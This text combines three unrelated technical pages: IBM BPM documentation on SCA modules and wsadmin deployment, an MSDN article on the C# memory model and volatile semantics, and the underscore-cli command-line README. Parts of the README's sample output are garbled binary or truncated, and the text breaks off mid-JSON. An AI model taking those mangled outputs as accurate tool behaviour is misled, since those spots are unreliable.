When a Business Object is created, a wizard allows us to enter its key characteristics. Core amongst these is the name of the Business Object (BO). When the wizard completes for a new BO, or if an existing BO is opened, the BO Editor is shown: The BO editor shows a container (the BO type) into which the fields of the BO may be defined. Each field added can be given its own name and data type. Fields can themselves be typed as other BOs and can also be typed as arrays of data. Once a data type is defined, that data type can be used within an SCA Interface definition: One of the primary purposes of SCA having Business Objects is to provide a normalized format for data passing between components. In addition, when raw physical data is received at an SCA Export, that data is parsed and a corresponding Business Object is constructed and passed forwards. This insulates other SCA components from having to concern themselves with the physical format of data sent by a service requestor. Conversely, when an SCA Import call is made and a parameter is a Business Object, the Business Object's data is serialized into a suitable physical format for outbound transmission. The Business Object's normalization of data moving around inside the SCA world makes all of this possible.

SCA Event Sequencing

The idea of event sequencing is to ensure that requests that arrive in a given order are processed in that order, but only when this would make a difference. If it doesn't matter what order the requests are processed in, they can be executed in parallel. Consider, for example, two requests that arrive in order. The first request creates a bank account and the second request deposits $100 in that account. If an attempt is made to execute these two requests in parallel, it is conceivable that the action to add $100 may take place before the creation of the bank account has completed. Next, consider a debit of $50 from one account and a credit of $75 to a different account.
Since these accounts are different and there is no relationship between the requests, the activities can happily execute in parallel. SCA Event Sequencing can be used to examine the data in an incoming request and, based on the content of that data, determine if the request should be held until previous requests have completed or whether it is eligible for immediate start.

Event Sequencing is enabled at the SCA diagram level. By selecting an interface on a component and then selecting an operation, we can add a quality of service, and one of the options is Event Sequencing. Once an Event Sequencing quality of service has been added, we can then define the properties for this attribute: Here we define the parameters used as input of the service and the XPath expression to the field or fields that are to be used for sequencing. The underlying implementation of Event Sequencing is based on a number of WAS-supplied applications and resources. Specifically: See also:

SCA Store and Forward

See also:

SCA Versions

SCA was an invention of IBM and some of her competitors. It was designed to provide interoperability between a variety of SOA players. SCA has become an industry standard and has undergone a variety of iterations. IBM's WebSphere Application Server provides an implementation of SCA as part of the base product; however, this is not the same SCA as is currently found in IBPM. See Also:

Installing an SCA Module through scripting

After having built an SCA module, we can export it as an EAR file for deployment. The deployment of the EAR can be accomplished through wsadmin-style scripting. The command called "AdminApp" can be used to work with EAR applications. Full details of using this command can be found in the WAS InfoCenter.

    AdminApp.install('<Path to EAR>')

An example of the output of the installation looks like:

    wsadmin>AdminApp.install('C:/temp/SCAInstall.ear')
    ADMA5016I: Installation of SCAInstallApp started.
    CWLIN1002I: Creating the WebSphere business integration context
    CWLIN1000I: Extracting the .ear file to a temporary location
    CWLIN1007I: Initializing the WebSphere business integration context
    CWLIN1005I: Performing WebSphere business integration precompilation tasks
    CWLIN1001I: Compiling generated artifacts
    CWLIN1006I: Performing WebSphere business integration postcompilation tasks
    CWLIN1004I: Creating an .ear file from the temporary location
    CWLIN1008I: Cleaning the WebSphere business integration context
    ADMA5058I: Application and module versions are validated with versions of deployment targets.
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    CWWBF0028I: Process components of SCAInstallApp have been successfully configured in the WebSphere configuration repository.
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    ADMA5081I: The bootstrap address for client module is configured in the WebSphere Application Server repository.
    ADMA5053I: The library references for the installed optional package are created.
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    ADMA5001I: The application binaries are saved in C:\IBM\WebSphere\AppServer\profiles\ProcCtr01\wstemp\Script13b19bdc42d\workspace\cells\win7-x64Node01Cell\applications\SCAInstallApp.ear\SCAInstallApp.ear
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    SECJ0400I: Successfully updated the application SCAInstallApp with the appContextIDForSecurity information.
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    ADMA5005I: The application SCAInstallApp is configured in the WebSphere Application Server repository.
    CWSCA3013I: Resources for the SCA application "SCAInstallApp" are being configured.
    CWSCA3023I: The EAR file "SCAInstallApp.ear" is being loaded for the SCA module.
    CWSCA3017I: Installation task "SCAModuleTask" is running.
    CWSCA3017I: Installation task "Resource Task for SCA Messaging Binding and EIS Binding" is running.
    CWSCA3017I: Installation task "Resource Task for SCA Messaging Binding and JMS Binding" is running.
    CWSCA3017I: Installation task "SIBus Destination Resource Task for SCA Asynchronous Invocations" is running.
    CWSCA3017I: Installation task "EJB NamespaceBinding Resource Task for SCAImportBinding" is running.
    CWSCA3017I: Installation task "SIBus Destination Resource Task for SCA SOAP/JMS Invocations" is running.
    CWSCA3017I: Installation task "Deployment Task for JaxWsImportBinding and JaxWsExportBinding" is running.
    CWSCA3014I: Resources for the SCA application "SCAInstallApp" have been configured successfully.
    ADMA5113I: Activation plan created successfully.
    ADMA5011I: The cleanup of the temp directory for application SCAInstallApp is complete.
    ADMA5013I: Application SCAInstallApp installed successfully.
    ''

After making changes through this command, remember to call:

    AdminConfig.save()

to save the configuration changes. Once installed, the application can be seen from the WAS admin console. Applications installed through scripting are initially in the stopped state:

SCA Tracing

There are times where we want to know what SCA is doing behind the scenes, and one way to achieve that is to switch on tracing. To switch on WAS-level tracing, we need to know which WAS trace flags we wish to enable.

SCA Cross Component Tracing

When we think of an SCA module, we should realize that it can span many processes and threads. As such, log information from it may be scattered throughout a log file over time and with multiple identifiers. Obviously, this can make examination of such data quite difficult. IBM has overcome this problem with a concept called "Cross Component Tracing".
The high-level idea behind this is that we can enable Cross Component Tracing (called XCT) on a per-SCA-application basis. When that application runs, log information is written either to the trace or to the System Console that contains enough detail for the flow through an SCA module to be visualized. Here is an example of a cross component trace for a given SCA module. We can see the entry and exit from each of the components in the assembly, including their start and end times. From an instrumentation standpoint, nothing new needs to be injected into the SCA module to enable this. This makes it available to be "switched on" in a production environment without the need for any kind of new application deployment (which might not be allowed in such a production environment).
https://learn.salientprocess.com/books/ibm-bpm/page/service-component-architecture
The C# Memory Model in Theory and Practice

By Igor Ostrovsky | December 2012

This is the first of a two-part series that will tell the long story of the C# memory model. The first part explains the guarantees the model makes. Consider a method Init that performs two ordinary writes: it first sets a field _data to 42 and then sets a flag field _initialized to true. If _data and _initialized are ordinary (that is, non-volatile) fields, the compiler and the processor are allowed to reorder the operations so that Init executes as if the two assignments were swapped: _initialized is set to true before _data is set to 42. There are various optimizations in both compilers and processors that can result in this kind of reordering, as I'll discuss in Part 2.

In a single-threaded program, the reordering of statements in Init makes no difference to the meaning of the program. As long as both _initialized and _data are updated before the method returns, the order of the assignments doesn't matter; there is no second thread that could observe the state in between the updates. In a multithreaded program, however, the order of the assignments may matter, because another thread might read the fields while Init is in the middle of execution. Consequently, in the reordered version of Init, another thread may observe _initialized == true and _data == 0.

The C# memory model is a set of rules that describes what kinds of memory-operation reordering are and are not allowed. All programs should be written against the guarantees defined in the specification. However, even if the compiler and the processor are allowed to reorder memory operations, it doesn't mean they always do so in practice. Many programs that contain a "bug" according to the abstract C# memory model will still execute correctly on particular hardware running a particular version of the .NET Framework. Notably, the x86 and x64 processors reorder operations only in certain narrow scenarios, and similarly the CLR just-in-time (JIT) compiler doesn't perform many of the transformations it's allowed to.
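The code snippets this passage refers to were lost in extraction; based on the DataInit class shown in full later in the article (minus the volatile keyword), the Init method and its reordered form can be sketched like this — the second version is what the compiler or processor may effectively execute, not code you would write:

```csharp
public class DataInit
{
    private int _data = 0;
    private bool _initialized = false;   // note: not volatile

    void Init()
    {
        _data = 42;            // Write 1
        _initialized = true;   // Write 2
    }
}

// With non-volatile fields, Init is allowed to execute as if it were written:
//
//     _initialized = true;   // Write 2 moved before Write 1
//     _data = 42;            // another thread can now observe true/0
```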
Although the abstract C# memory model is what you should have in mind when writing new code, it can be helpful to understand the actual implementation of the memory model on different architectures, in particular when trying to understand the behavior of existing code.

C# Memory Model According to ECMA-334

The authoritative definition of the C# memory model is in the Standard ECMA-334 C# Language Specification (bit.ly/MXMCrN). Let's discuss the C# memory model as defined in the specification.

Memory Operation Reordering

According to ECMA-334, when a thread reads a memory location in C# that was written to by a different thread, the reader might see a stale value. This problem is illustrated in Figure 1. Suppose Init and Print are called in parallel (that is, on different threads) on a new instance of DataInit. If you examine the code of Init and Print, it may seem that Print can only output "42" or "Not initialized." However, Print can also output "0."

The C# memory model permits reordering of memory operations in a method, as long as the behavior of single-threaded execution doesn't change. For example, the compiler and the processor are free to reorder the Init method operations so that _initialized is written before _data. This reordering wouldn't change the behavior of the Init method in a single-threaded program. In a multithreaded program, however, another thread might read the _initialized and _data fields after Init has modified one field but not the other, and then the reordering could change the behavior of the program. As a result, the Print method could end up outputting a "0."

The reordering of Init isn't the only possible source of trouble in this code sample. Even if the Init writes don't end up reordered, the reads in the Print method could be transformed: _data could be read before _initialized is checked. Just as with the reordering of writes, this transformation has no effect in a single-threaded program, but might change the behavior of a multithreaded program.
And, just like the reordering of writes, the reordering of reads can also result in a 0 printed to the output. In Part 2 of this article, you'll see how and why these transformations take place in practice when I look at different hardware architectures in detail.

Volatile Fields

The volatile keyword constrains how memory operations around a field may be reordered. A read of a volatile field has acquire semantics, which means it can't be reordered with memory operations that come after it; it forms a one-way fence. Consider a method Foo whose body performs three reads in order: Read 1 from an ordinary field, Read 2 from a volatile field, and Read 3 from another ordinary field. Read 2 can't be reordered with Read 3, but it can be reordered with Read 1. Figure 2 shows the valid reorderings of the Foo body.

Figure 2 Valid Reordering of Reads in AcquireSemanticsExample

A write of a volatile field, on the other hand, has release semantics, and so it can't be reordered with prior operations. A volatile write forms a one-way fence in the other direction. Consider a Foo body that performs three writes in order: Write 1 to an ordinary field, Write 2 to a volatile field, and Write 3 to another ordinary field. Write 2 can't be reordered with Write 1, but it can be reordered with Write 3. Figure 3 shows the valid reorderings of the Foo body.

Figure 3 Valid Reordering of Writes in ReleaseSemanticsExample

I'll come back to the acquire-release semantics in the "Publication via Volatile Field" section later in this article.

Atomicity

Another issue to be aware of is that in C#, values aren't necessarily written atomically into memory. Consider a class with a Guid field _value, a SetValue method that assigns it, and a GetValue method that returns it. If one thread repeatedly calls SetValue and another thread calls GetValue, the getter thread might observe a value that was never written by the setter thread. For example, if the setter thread alternately calls SetValue with Guid values (0,0,0,0) and (5,5,5,5), GetValue could observe (0,0,0,5) or (0,0,5,5) or (5,5,0,0), even though none of those values was ever assigned using SetValue. The reason behind the "tearing" is that the assignment "_value = value" doesn't execute atomically at the hardware level. Similarly, the read of _value also doesn't execute atomically.

The C# ECMA specification guarantees that the following types will be written atomically: reference types, bool, char, byte, sbyte, short, ushort, uint, int and float.
Values of other types—including user-defined value types—could be written into memory in multiple atomic writes. As a result, a reading thread could observe a torn value consisting of pieces of different values. One caveat is that even the types that are normally read and written atomically (such as int) could be read or written non-atomically if the value is not correctly aligned in memory. Normally, C# will ensure that values are correctly aligned, but the user is able to override the alignment using the StructLayoutAttribute class (bit.ly/Tqa0MZ).

The compiler and the hardware may also perform optimizations that don't reorder memory operations but still change the behavior of multithreaded code—for example, coalescing repeated reads of the same field into a single read. Because the ECMA C# spec doesn't rule out these non-reordering optimizations, they're presumably allowed. In fact, as I'll discuss in Part 2, the JIT compiler does perform these types of optimizations.

Thread Communication Patterns

The purpose of a memory model is to enable thread communication. When one thread writes values to memory and another thread reads from memory, the memory model dictates what values the reading thread might see.

Locking

Locking is typically the easiest way to share data among threads. If you use locks correctly, you basically don't have to worry about any of the memory model messiness. Whenever a thread acquires a lock, the CLR ensures that the thread will see all updates made by the thread that held the lock earlier.

Let's add locking to the example from the beginning of this article, as shown in Figure 4. Adding a lock that Print and Set acquire provides a simple solution. Now, Set and Print execute atomically with respect to each other. The lock statement guarantees that the bodies of Print and Set will appear to execute in some sequential order, even if they're called from multiple threads. The diagram in Figure 5 shows one possible sequential order that could happen if Thread 1 calls Print three times, Thread 2 calls Set once and Thread 3 calls Print once.
Figure 5 Sequential Execution with Locking

When a locked block of code executes, it's guaranteed to see all writes from blocks that precede it in the sequential order of the lock. Also, it's guaranteed not to see any of the writes from blocks that follow it in the sequential order of the lock. In short, locks hide all of the unpredictability and complexity of the memory model: you don't have to worry about the reordering of memory operations if you use locks correctly. However, note that the use of locking has to be correct. If only Print or Set uses the lock—or if Print and Set acquire two different locks—memory operations can become reordered and the complexity of the memory model comes back.

Publication via Threading API

Locking is a very general and powerful mechanism for sharing state among threads. Publication via a threading API is another frequently used pattern of concurrent programming. The easiest way to illustrate it is by way of an example: one thread writes 42 to a non-volatile static field s_value and then starts a task via StartNew; the task reads s_value and prints it. When you examine such a code sample, you'd probably expect "42" to be printed to the screen. And, in fact, your intuition would be correct: this code is guaranteed to print "42."

It might be surprising that this case even needs to be mentioned, but in fact there are possible implementations of StartNew that would allow "0" to be printed instead of "42," at least in theory. After all, there are two threads communicating via a non-volatile field, so memory operations can be reordered. The pattern is displayed in the diagram in Figure 6.

Figure 6 Two Threads Communicating via a Non-Volatile Field

The StartNew implementation must ensure that the write to s_value on Thread 1 will not move after <start task t>, and the read from s_value on Thread 2 will not move before <task t starting>. And, in fact, the StartNew API really does guarantee this.
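The publication-via-threading-API example the text describes can be sketched as follows; the class and method names are assumptions, but the guarantee about s_value is the article's point:

```csharp
using System;
using System.Threading.Tasks;

class Test2
{
    static int s_value;   // deliberately non-volatile

    static void Run()
    {
        s_value = 42;                         // write on Thread 1
        Task t = Task.Factory.StartNew(() =>
        {
            Console.WriteLine(s_value);       // read on Thread 2: guaranteed to print 42
        });
        t.Wait();
    }
}
```

The barrier semantics of StartNew are what prevent the write and the read from moving across the task-start boundary.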
All other threading APIs in the .NET Framework, such as Thread.Start and ThreadPool.QueueUserWorkItem, also make a similar guarantee. In fact, nearly every threading API must have some barrier semantics in order to function correctly. These are almost never documented, but can usually be deduced simply by thinking about what the guarantees would have to be in order for the API to be useful.

Publication via Type Initialization

Another way to safely publish a value to multiple threads is to write the value to a static field in a static initializer or a static constructor. Consider a class Test3 whose static initializer assigns the values that a PrintValue method later prints. If Test3.PrintValue is called from multiple threads concurrently, is it guaranteed that each PrintValue call will print "42" and "false"? Or could one of the calls also print "0" or "true"? Just as in the previous case, you do get the behavior you'd expect: each thread is guaranteed to print "42" and "false."

The patterns discussed so far all behave as you'd expect. Now I'll get to cases whose behavior may be surprising.

Publication via Volatile Field

Many concurrent programs can be built using the three simple patterns discussed so far, together with the concurrency primitives in the .NET System.Threading and System.Collections.Concurrent namespaces. The pattern I'm about to discuss is so important that the semantics of the volatile keyword were designed around it. In fact, the best way to remember the volatile keyword semantics is to remember this pattern, instead of trying to memorize the abstract rules explained earlier in this article.

Let's start with the example code in Figure 7. The DataInit class in Figure 7 has two methods, Init and Print; both may be called from multiple threads. If no memory operations are reordered, Print can only print "Not initialized" or "42," but there are two cases in which Print could print a "0":

- Write 1 and Write 2 were reordered.
- Read 1 and Read 2 were reordered.
public class DataInit
{
    private int _data = 0;
    private volatile bool _initialized = false;

    void Init()
    {
        _data = 42;            // Write 1
        _initialized = true;   // Write 2
    }

    void Print()
    {
        if (_initialized)                      // Read 1
        {
            Console.WriteLine(_data);          // Read 2
        }
        else
        {
            Console.WriteLine("Not initialized");
        }
    }
}

If _initialized were not marked as volatile, both reorderings would be permitted. However, when _initialized is marked as volatile, neither reordering is allowed! In the case of the writes, you have an ordinary write followed by a volatile write, and a volatile write can't be reordered with a prior memory operation. In the case of the reads, you have a volatile read followed by an ordinary read, and a volatile read can't be reordered with a subsequent memory operation. So, Print will never print "0," even if called concurrently with Init on a new instance of DataInit.

Note that if the _data field were volatile but _initialized were not, both reorderings would still be permitted. As a result, remembering this example is a good way to remember the volatile semantics.

Lazy Initialization

One common variant of publication via a volatile field is lazy initialization. The example in Figure 8 illustrates lazy initialization. In this example, LazyGet is always guaranteed to return "42." However, if the _box field were not volatile, LazyGet would be allowed to return "0" for two reasons: the reads could get reordered, or the writes could get reordered.

To further emphasize the point, consider a BoxedInt class that simply wraps an int value, published through a non-volatile BoxedInt field _box: one thread assigns a new BoxedInt(42) to _box while another thread calls a PrintValue method that reads it. Now, it's possible—at least in theory—that PrintValue will print "0" due to a memory-model issue. Because the BoxedInt instance was incorrectly published (through a non-volatile field, _box), the thread that calls Print may observe a partially constructed object! Again, making the _box field volatile would fix the issue.
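The lazy-initialization listing of Figure 8 did not survive extraction; it can be sketched as follows. The field and method names are assumptions, but the role of the volatile _box field is exactly the article's point:

```csharp
using System;

class BoxedInt
{
    public int Value;
    public BoxedInt(int value) { Value = value; }
}

class LazyInitExample
{
    private volatile BoxedInt _box;   // volatile is what makes the publication safe

    public int LazyGet()
    {
        BoxedInt b = _box;            // volatile read: can't be reordered with later reads
        if (b == null)
        {
            b = new BoxedInt(42);
            _box = b;                 // volatile write: publishes a fully constructed object
        }
        return b.Value;               // always 42
    }
}
```

Without volatile on _box, the write of _box could be reordered before the write of Value, or the read of Value could be reordered before the read of _box — either reordering lets a reader see 0.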
Interlocked Operations and Memory Barriers

Interlocked operations are atomic operations that can be used at times to reduce locking in a multithreaded program. Consider a simple thread-safe counter class whose Increment method takes a lock and increments an integer field _value. Using Interlocked.Increment, you can rewrite the method to simply call Interlocked.Increment(ref _value), without taking any lock. As rewritten with Interlocked.Increment, the method should execute faster, at least on some architectures.

In addition to the increment operations, the Interlocked class (bit.ly/RksCMF) exposes methods for various atomic operations: adding a value, conditionally replacing a value, replacing a value and returning the original value, and so forth. All Interlocked methods have one very interesting property: they can't be reordered with other memory operations. So no memory operation, whether before or after an Interlocked operation, can pass an Interlocked operation.

An operation that's closely related to the Interlocked methods is Thread.MemoryBarrier, which can be thought of as a dummy Interlocked operation. Just like an Interlocked method, Thread.MemoryBarrier can't be reordered with any prior or subsequent memory operations. Unlike an Interlocked method, though, Thread.MemoryBarrier has no side effect; it simply constrains memory reorderings.

Polling Loop

Polling loop is a pattern that's generally not recommended but—somewhat unfortunately—frequently used in practice. Figure 9 shows a broken polling loop.

class PollingLoopExample
{
    private bool _loop = true;

    public static void Main()
    {
        PollingLoopExample test1 = new PollingLoopExample();

        // Set _loop to false on another thread
        new Thread(() => { test1._loop = false; }).Start();

        // Poll the _loop field until it is set to false
        while (test1._loop) ;

        // The previous loop may never terminate
    }
}

In this example, the main thread loops, polling a particular non-volatile field. A helper thread sets the field in the meantime, but the main thread may never see the updated value. Now, what if the _loop field were marked volatile? Would that fix the program?
The general expert consensus seems to be that the compiler isn't allowed to hoist a volatile field read out of a loop, but it's debatable whether the ECMA C# specification makes this guarantee. On one hand, the specification states only that volatile fields obey the acquire-release semantics, which doesn't seem sufficient to prevent hoisting of a volatile field read. On the other hand, the example code in the specification does in fact poll a volatile field, implying that the volatile field read can't be hoisted out of the loop.

On x86 and x64 architectures, PollingLoopExample.Main will typically hang. The JIT compiler will read the test1._loop field just once, save the value in a register, and then loop until the register value changes, which will obviously never happen. If the loop body contains some statements, however, the JIT compiler will probably need the register for some other purpose, so each iteration may end up rereading test1._loop. As a result, you may end up seeing loops in existing programs that poll a non-volatile field and yet happen to work.

Concurrency Primitives

Much concurrent code can benefit from the high-level concurrency primitives that became available in the .NET Framework 4. Figure 10 lists some of the .NET concurrency primitives.

Figure 10 Concurrency Primitives in the .NET Framework 4

By using these primitives, you can often avoid low-level code that depends on the memory model in intricate ways (via volatile and the like).

Coming Up

So far, I've described the C# memory model as defined in the ECMA C# specification, and discussed the most important patterns of thread communication that define the memory model. The second part of this article will explain how the memory model is actually implemented on different architectures, which is helpful for understanding the behavior of programs in the real world.
Best Practices

- All code you write should rely only on the guarantees made by the ECMA C# specification, and not on any of the implementation details explained in this article.
- Avoid unnecessary use of volatile fields. Most of the time, locks or concurrent collections (System.Collections.Concurrent.*) are more appropriate for exchanging data between threads. In some cases, volatile fields can be used to optimize concurrent code, but you should use performance measurements to validate that the benefit outweighs the extra complexity.
- Instead of implementing the lazy initialization pattern yourself using a volatile field, use the System.Lazy<T> and System.Threading.LazyInitializer types.
- Avoid polling loops. Often, you can use a BlockingCollection<T>, Monitor.Wait/Pulse, events or asynchronous programming instead of a polling loop.
- Whenever possible, use the standard .NET concurrency primitives instead of implementing equivalent functionality yourself.

Igor Ostrovsky is a senior software development engineer at Microsoft. He has worked on Parallel LINQ, the Task Parallel Library, and other parallel libraries and primitives in the Microsoft .NET Framework. Ostrovsky blogs about programming topics at igoro.com.

Thanks to the following technical experts for reviewing this article: Joe Duffy, Eric Eilebrecht, Joe Hoag, Emad Omara, Grant Richins, Jaroslav Sevcik and Stephen Toub
https://msdn.microsoft.com/en-us/magazine/jj863136.aspx
Command-line interface to underscore.js - useful for shell scripting and JSON processing

JSON is an excellent data interchange format and rapidly becoming the preferred format for Web APIs. Thus far, most of the tools to process it are very limited. Yet, when working in JavaScript, JSON is fluid and natural. Why can't command-line JavaScript be easy?

Underscore-CLI can be a simple pretty printer:

    cat data.json | underscore print --color

Or it can form the backbone of a rich, full-powered JavaScript command line, inspired by "perl -pe", doing for structured data what sed, awk, and grep do for text.

    cat example-data/earthporn.json | underscore extract 'data.children' | underscore pluck data | underscore pluck title

See [Real World Example](#real_world_example) for the output and more examples.

Underscore-CLI is built on Node.js, which is less than a 4M download and very easy to install. Node.js is rapidly gaining mindshare as a tool for writing scalable services in JavaScript. Unfortunately, out of the box, Node.js is pretty horrible as a command-line tool. This is what it takes to simply echo stdin:

    cat foo.json | node -e '
    var data = "";
    process.stdin.setEncoding("utf8");
    process.stdin.on("data", function (d) { data = data + d; });
    process.stdin.on("end", function () {
      // put all your code here
      console.log(data);
    });
    process.stdin.resume();
    '

Ugly. Underscore-CLI handles all the verbose boilerplate, making it easy to do simple data manipulations:

    echo '[1, 2, 3, 4]' | underscore process 'map(data, function (value) { return value+1 })'

If you are used to seeing "_.map", note that because we aren't worried about keeping the global namespace clean, many useful functions (including all of underscore.js) are exposed as globals. Of course, 'mapping' a function over a dataset is super common, so as a shortcut it's exposed as a first-class command, and the expression you provide is auto-wrapped in "function (value, key, list) { return ... }".
    echo '[1, 2, 3, 4]' | underscore map 'value+1'

Also, while you can pipe data in, if the data is just a string like the example above, there's a shortcut for that too:

    underscore -d '[1, 2, 3, 4]' map 'value+1'

Or if it's stored in a file, and you want to write the output to another file:

    underscore -i data.json map 'value+1' -o output.json

Here's what it takes to increment the patch version number for an NPM package (straight from our Makefile):

    underscore -i package.json process 'vv=data.version.split("."),vv[2]++,data.version=vv.join("."),data' -o package.json

Installing Node is easy, and it's only a 4M download. Alternatively, if you do homebrew, you can:

    brew install node

For more details on what Node is, see this StackOverflow thread.

    npm install -g underscore-cli
    underscore help

If you run the tool without any arguments, this is what prints out:

    Usage: underscore <command> [--in <filename>|--data <JSON>|--nodata] [--infmt <format>] [--out <filename>] [--outfmt <format>] [--quiet] [--strict] [--color] [--text] [--trace] [--coffee] [--js]

    Commands:
      help [command]      Print more detailed help and examples for a specific command
      type                Print the type of the input data: {object, array, number, string, boolean, null, undefined}
      print               Output the data without any transformations. Can be used to pretty-print JSON data.
      pretty              Output the data without any transformations. Can be used to pretty-print JSON data. (defaults output format to 'pretty')
      run <exp>           Runs arbitrary JS code. Use for CLI Javascripting.
      process <exp>       Run arbitrary JS against the input data. Expression Args: (data)
      extract <field>     Extract a field from the input data. Also supports field1.field2.field3
      map <exp>           Map each value from a list/object through a transformation expression whose arguments are (value, key, list).
      reduce <exp>        Boil a list down to a single value by successively combining each element with a running total.
                          Expression args: (total, value, key, list)
      reduceRight <exp>   Right-associative version of reduce, ie, 1 + (2 + (3 + 4)). Expression args: (total, value, key, list)
      select <jselexp>    Run a 'JSON Selector' query against the input data. See jsonselect.org.
      find <exp>          Return the first value for which the expression returns a truish value. Expression args: (value, key, list)
      filter <exp>        Return an array of all values that make the expression true. Expression args: (value, key, list)
      reject <exp>        Return an array of all values that make the expression false. Expression args: (value, key, list)
      flatten             Flattens a nested array (the nesting can be to any depth). If you pass '--shallow', the array will only be flattened a single level.
      pluck <key>         Extract a single property from a list of objects
      keys                Retrieve all the names of an object's properties.
      values              Retrieve all the values of an object's properties.
      extend <object>     Override properties in the input data.
      defaults <object>   Fill in missing properties in the input data.
      any <exp>           Return 'true' if any of the values in the input make the expression true. Expression args: (value, key, list)
      all <exp>           Return 'true' if all values in the input make the expression true. Expression args: (value, key, list)
      isObject            Return 'true' if the input data is an object with named properties
      isArray             Return 'true' if the input data is an array
      isString            Return 'true' if the input data is a string
      isNumber            Return 'true' if the input data is a number
      isBoolean           Return 'true' if the input data is a boolean, ie {true, false}
      isNull              Return 'true' if the input data is the 'null' value
      isUndefined         Return 'true' if the input data is undefined
      template <filename> Process an underscore template and print the results. See 'help template'

    Options:
      -h, --help           output usage information
      -V, --version        output the version number
      -i, --in <filename>  The data file to load. If not specified, defaults to stdin.
      --infmt <format>     The format of the input data.
                           See 'help formats'
      -o, --out <filename> The output file. If not specified, defaults to stdout.
      --outfmt <format>    The format of the output data. See 'help formats'
      -d, --data <JSON>    Input data provided in lieu of a filename
      -n, --nodata         Input data is 'undefined'
      -q, --quiet          Suppress normal output. 'console.log' will still trigger output.
      --strict             Use strict JSON parsing instead of more lax 'eval' syntax. To avoid security concerns, use this with ANY data from an external source.
      --color              Colorize output
      --text               Parse data as text instead of JSON. Sets input and output formats to 'text'
      --trace              Print stack traces when things go wrong
      --coffee             Interpret expression as CoffeeScript. See
      --js                 Interpret expression as JavaScript. (default is "auto")

    Examples:
      underscore map --data '[1, 2, 3, 4]' 'value+1'
      # [2, 3, 4, 5]
      underscore map --data '{"a": [1, 4], "b": [2, 8]}' '_.max(value)'
      # [4, 8]
      echo '{"foo":1, "bar":2}' | underscore map -q 'console.log("key = ", key)'
      # "key = foo\nkey = bar"
      underscore pluck --data "[{name : 'moe', age : 40}, {name : 'larry', age : 50}, {name : 'curly', age : 60}]" name
      # ["moe", "larry", "curly"]
      underscore keys --data '{name : "larry", age : 50}'
      # ["name", "age"]
      underscore reduce --data '[1, 2, 3, 4]' 'total+value'
      # 10

The default format. Outputs strictly correct, human-readable JSON with smart whitespace. This format has received a lot of love. Try the '--color' flag.

Dense JSON using JSON.stringify. Efficient, but hard to read.

Formatted JSON using JSON.stringify. A bit too verbose.

A richer 'inspection' syntax. When printing array-and-object graphs that can be generated by JSON.parse, the output is valid JavaScript syntax (but not strict JSON). When handling complex objects not expressable in declarative JavaScript (eg arrays that also have object properties), the output is informative, but not parseable as JavaScript.
{ num: 9, bool: true, str1: "Hello World", object0: { }, object1: { a: 1, b: 2 }, array0: [ ], array1: [1, 2, 3, 4], array2: [1, 2, null, undefined, , 6], date1: 2012-06-28T22:02:25.993Z, date2: 2012-06-28T22:02:25.993Z{ ], fn4: [Function],!" } } } Uses Node's 'util.inspect' to print the output { num: 9, bool: true, str1: 'Hello World', object0: {}, object1: { a: 1, b: 2 }, array0: [], array1: [ 1, 2, 3, 4 ], array2: [ 1, 2, null, undefined, , 6 ], date1: Thu Jun 28 2012 15:02:25 GMT-0700 (PDT), date2: { Thu, 28 Jun 2012 22:02:25 GMT ] '3': 'three', prop1: 1, prop2: 2 }, fn4: { [Function] '3': 'three', prop1: 1, prop2: 2 },!' } } } If data is a string, it is printed directly without quotes. If data is an array, elements are separated by newlines. Objects and arrays-within-arrays are JSON formated into a single line. The stock example does not convey the intent of this format, which is designed to enable traditional text processing via JavaScript and to facilitate flattening of JSON lists into line-delimited lists. MessagePack binary JSON format Þ�£num ¤boolästr1«Hello World§object0€§object1‚¡a¡b¦array0¦array1”¦array2–ÀÀÀ¥date1¸2012-06-28T22:02:25.993Z¥date2¸2012-06-28T22:02:25.993Z¤err1€¤err2ƒ¥three¥prop1¥prop2¦regex1€¦regex2ƒ¥three¥prop1¥prop2£fn1€£fn2€£fn3ƒ¥three¥prop1¥prop2£fn4ƒ¥three¥prop1¥prop2¥null1À¦undef1À¤deep‚¡a‘‚§longstrÚ�This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed!¡b¡c€¡g§longstrÚ�This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed! 
Textual representation of MessagePack <de><00><15><a3>num<09><a4>bool<c3><a4>str1<ab>Hello World<a7>object0<80><a7>object1<82><a1>a<01><a1>b<02><a6>array0<90><a6>array1<94><01><02><03><04><a6>array2<96><01><02><c0><c0><c0><06><a5>date1<b8>2012-06-28T22:02:25.993Z<a5>date2<b8>2012-06-28T22:02:25.993Z<a4>err1<80><a4>err2<83><03><a5>three<a5>prop1<01><a5>prop2<02><a6>regex1<80><a6>regex2<83><03><a5>three<a5>prop1<01><a5>prop2<02><a3>fn1<80><a3>fn2<80><a3>fn3<83><03><a5>three<a5>prop1<01><a5>prop2<02><a3>fn4<83><03><a5>three<a5>prop1<01><a5>prop2<02><a5>null1<c0><a6>undef1<c0><a4>deep<82><a1>a<91><82><a7>longstr<da><00><8f>This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed!<a1>b<81><a1>c<80><a1>g<81><a7>longstr<da><00><8f>This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed! Let's play with a real data source, like. For convenience (and consistent test results), an abbreviated version of this data is stored in example-data/earthporn.json. First of all, note how raw unformatted JSON is really hard to parse with your eyes ... {"kind":"Listing","data":{"modhash":"","children":[{"kind":"t3","data":{"domain":"i.imgur.com","banned_by":null,"media_e mbed":{},"subreddit":"EarthPorn","selftext_html":null,"selftext":"","likes":null,"saved":false,"id":"rwoa4","clicked":fa lse,"title":"Eating breakfast in the Norwegian woods! 
